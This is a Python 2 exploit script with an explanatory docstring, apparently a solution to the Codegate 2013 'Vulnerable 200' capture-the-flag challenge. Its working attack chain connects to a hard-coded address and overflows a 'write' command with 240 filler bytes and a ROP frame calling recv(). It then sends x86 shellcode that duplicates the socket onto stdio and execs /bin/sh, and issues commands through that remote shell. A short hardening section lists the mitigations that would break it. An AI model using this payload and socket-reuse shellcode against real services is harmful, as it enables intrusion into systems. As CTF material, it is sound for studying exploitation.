Codegate 2013 Vulnerable 200 exploit code
"""Codegate 2013 "Vulnerable 200" CTF solution (Python 2 script).

Sample run recorded by the author:

    $python vuln200.py
    [+] send pwning payload (Stage 1)
    [+] Execute Shell (Stage 2)
    uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)

What the script sends: the service's "write" command followed by 240
filler bytes and six native-endian 32-bit words. The words are laid out
like a 32-bit cdecl call frame (code address, return address, four
arguments). The author's note says the call is recv() and the buffer is in
.data, so the second stage is read into that buffer and control then
returns into it.

Hardening view: both addresses are hard-coded and the received bytes are
run from a data section, so the approach presumably relies on a non-PIE
binary with no stack protector and an executable .data mapping. A length
check on the "write" argument, a stack canary, non-executable data pages
or PIE would each break one of those assumptions.
"""
import socket
import time
from struct import pack

# Upper bound passed to every recv() call in this script.
RECV_MAX = 10240

host = "58.229.122.19"
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.connect((host, 7777))
sk.recv(RECV_MAX)  # menu


def do_write(msg):
    """Send ``msg`` through the service's "write" command and drain two replies.

    NOTE(review): the listing's indentation was lost; all three socket calls
    are taken to be this function's body, since the reads only make sense
    after the send.
    """
    line = "write" + msg + "\n"
    sk.send(line)
    for _ in range(2):
        sk.recv(RECV_MAX)


# Stage 2 bytes, reproduced unchanged. Reading the opcodes: an int 0x80 loop
# issuing syscall 0x3f with descriptor 4 (dup2 onto 2, 1, 0), then syscall
# 0x0b (execve) on the pushed string "/bin//sh".
shellcode = "\x31\xc0\x31\xdb\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"

# Author's note: do rop with recv() and use .data for paste shellcode.
frame_words = (
    0x08048780,  # call target (recv, per the author's note)
    0x0804b07c,  # return address: same value as the buffer argument below
    4,           # first argument; presumably the client socket descriptor
    0x0804b07c,  # destination buffer (.data, per the author's note)
    0x1000,      # length argument
    0,           # flags argument
)
rop = "".join(pack("I", word) for word in frame_words)

# 240 filler bytes precede the frame; the offset is the author's value.
payload = "A" * 240 + rop

print "[+] send pwning payload (Stage 1)"
do_write(payload)

print "[+] Execute Shell (Stage 2)"
sk.send(shellcode + "\n")

# Each command is sent and one reply is printed before the next is sent.
for command in ("id\n", "ls -la\n", "cat key\n", "cat Pwned.txt\n"):
    sk.send(command)
    print sk.recv(RECV_MAX)